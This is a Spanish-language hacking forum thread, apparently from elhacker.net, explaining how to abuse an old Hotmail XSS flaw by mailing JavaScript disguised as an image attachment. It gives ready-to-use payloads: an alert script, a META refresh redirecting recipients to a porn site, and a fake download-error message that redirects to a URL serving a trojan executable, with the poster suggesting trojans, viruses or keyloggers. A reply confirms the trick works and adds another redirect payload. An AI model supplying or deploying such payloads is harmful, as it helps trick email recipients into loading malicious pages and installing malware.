Enaz! visitando distintos foros, observe que existe la posibilidad de probar XSS en hotmail, lo cual consiste en hacer un simple codigo en javascript en bloc de notas y guardalo con la extensión de una imagen ( jpg, gif).

Ejemplo:

<script language="javascript">
alert('Mousehack was here');
</script>

una vez guardado en el block de notas, se lo envia por mail a quien quiera, que al descargar el adjunto se ejecutara el codigo.

Q se puede hacer con esto? depende de la creatividad de cada uno por ej:

<META HTTP-EQUIV="Refresh" CONTENT='1;URL=http://paginaporno.com '>

este code hace que se redireccione a una pagina, en este caso una porno, pero puede ser tu pagina u otras...

<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="3;URL=http://pagina.com/troyano.exe">

este code aparenta que da un error en la descarga y redirecciona a una pagina donde podes poner un troyano, virus, keylogger,etc

Existen otras posibilidades, depende de vuestra inventiva...

Fuente: PerrosHackers

Salu2

Junio 2003
HOTMAIL XSS and AV bypass exploit
http://foro.elhacker.net/index.php/topic,13947.0.html

Julio 2004
XSS en Hotmail
http://foro.elhacker.net/index.php/topic,35704.0.html

Febrero 2005
Nueva vulnerabilidad en Hotmail
http://foro.elhacker.net/index.php/topic,58021.0.html

pues a mi me funciono perfectamente...

prueba con enviarlo poniendo esto...

<script language="javascript">
alert('Error, se intentara descargar de nuevo');
</script>
<META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://ciberia.ya.com/webmousehack/owned.txt">

y fijate q te llega como correo no deseado.

el-brujo sorry no me fije si el tema ya fue posteado, para la proxima ...

Salu2